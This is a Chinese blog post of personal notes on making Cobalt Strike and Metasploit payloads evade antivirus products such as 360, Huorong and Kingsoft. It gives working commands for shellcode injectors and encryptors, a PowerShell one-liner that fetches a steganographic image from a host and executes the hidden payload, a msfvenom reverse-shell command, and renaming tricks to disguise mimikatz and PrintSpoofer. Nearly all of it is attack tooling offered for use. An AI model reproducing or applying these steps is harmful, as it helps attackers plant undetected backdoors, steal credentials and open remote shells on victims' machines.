免杀部分2

免杀(虚拟机windows11)


把那个hanzoInjection-master和cs生成的那个payload(二进制的raw 没有64位)放在一起
cd /d C:\Users\20755\Desktop\hanzoInjection-master
HanzoInjection.exe -e payload.bin
运行可以过360跟火绒(都可以)

Invoke-PSImage(物理机的)记得重新把文件重新导入如果在虚拟机弄
把那个东西跟一个图片放在一起在加一个payload powershell (64位) 执行代码在cmd
cd /d C:\Users\20755\Desktop\Invoke-PSImage-master
Powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\test.jpg –Out test2.png –Web
得到一个代码然后把生成的图片用cs的文件上传得到的地址去替换里面的东西sal a New-Object;Add-Type -sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.75.129:80/test.png"));$o=a Byte[] 3600;(0..8)|%{foreach($x in(0..399)){$p=$g.GetPixel($x,$_);$o[$_*400+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3554]))
在靶机上运行那个(360可以,火绒可以,金山毒霸不行)

ShellCodeRunner(过360,还可以过金山毒霸,火绒不行)


打开那个文件进去编译那个XORKryptor文件然后得到一个exe的东西这个没有用,接着去cs里面去弄得到那个payload(64位的选择raw的)将文件放在ShellCodeRunner-master\XORKryptor\bin\Debug路径下面去打开
cmd  输入cd /d C:\Users\indexae\Desktop\ShellCodeRunner-master\XORKryptor\bin\Debug
ShellCodeRunner.exe payload.bin 生成encrypt.bin文件 
去那个shellcoderunner下面建一个\Resources文件夹然后将那个encrypt.bin文件放进去,去生成
文件在
C:\Users\indexae\Desktop\ShellCodeRunner-master\ShellCodeRunner\bin\Debug\ShellCodeRunner.exe


掩日免杀(360不可以,火绒不行,在新的机子里面),去编译1.0的那个可以使用掩日(过火绒,不能过360)
2.0可以过360不能过火绒


mimikatz免杀(普通版可以过360,升级版360,金山毒霸都可以火绒都不行,但是可以加上壳都可以过)


去那个windows10 密码跟那个一样账号 打开那个文件
右键属性然后改那个平台工具集 改成v143 和那个c++中的将警告视为错误改为否
去那个最上面的解决问题右键属性改对应文件的编译格式X64
去编译第一种
可以将那个对应文字进行替换比如mimikatz改为moon(在编辑中的查找,记得将目标选择为在文件中替换(整个解决方案))第二中
第三可以改那个将文件的c跟主文件的注释去掉,然后去那个.ic后缀的改里面的版本信息;将美国改掉去那个vsiuo的新建版本信息,最后去把图标换了,图标的名字得跟本来的一模一样

PrintSpoofer(源代码免杀跟猕猴桃差不多,360可以火绒不行)


第一步可以得将上面的debug弄成release生成(什么都过不了)
第二个可以将那个后缀的.cpp跟那个总的源文件都变成那个新的名字,记得将那个可以将那个对应文字进行替换比如PrintSpoofer改为moon(在编辑中的查找,记得将目标选择为在文件中替换(整个解决方案)),在去删掉注释(留下)VOID PrintUsage()
{
    wprintf(
        L"\n"
        "PrintSpoofer\n"
        "\n"

    );

}在补上一个图标可以过360


darkarmour(360偶尔可以,其他不行)


cd darkarmour 
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.75.130 lport=4444 -f exe -o exploit.exe
./darkarmour.py -f exploit.exe --encrypt xor--jmp -o e.exe --loop 5
设置后门

shellcode-launch(360偶尔可以,其他不行)

set CGO_ENABLED=0
set GOOS=windows
set GOARCH=amd64
go build -ldflags="-s -w" winlaunch.go  弄一个文件64.bat放这些内容
将那个winlaunch.go值改为cspayload C语言的内容(64位) 
将文件夹放进去那个profile中的那个go 中的那个src 点那个64.bat去运行

shellgo免杀(在那个windows10)


将那个cs生成的那个c#(64位的东西)复制内容去替换里面的内容C:\Users\indexae\Desktop\shellGo
go build main.go(都不行)


python免杀(虚拟机已经搞定了执行命令windows11)记得重新把文件


安装python2.7 
增加环境变量
安装生成exe的库    (环境变量两个一个python一个Python里面的script)
cd /d C:\Users\20755\Desktop\PyInstaller-3.5
Python setup.py install
不能带有中文路径否则出错
Pip install pyinstaller
生成exe文件
pyinstaller -F bb.py(在那个windows11靶机)记得把cs生成的Python payload弄在那个文件家里面
360查杀 火绒杀
 
veil在新的kali里面 root 0108


在cs paload veil的那个然后再去复制里面的那个全部内容
use 1
选择Evasion逃逸
list
use 17
选择go语言模块
输入generate
选择3 自定义payload
输入自定义payload的字符串
改一个名字cc
       什么都不行

metasploit-loader(这个免杀过360)


cd metasploit-loader
cd src 
i686-w64-mingw32-gcc main.c -o mm2.exe -lws2_32
mv mm2.exe / 

  • 36
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值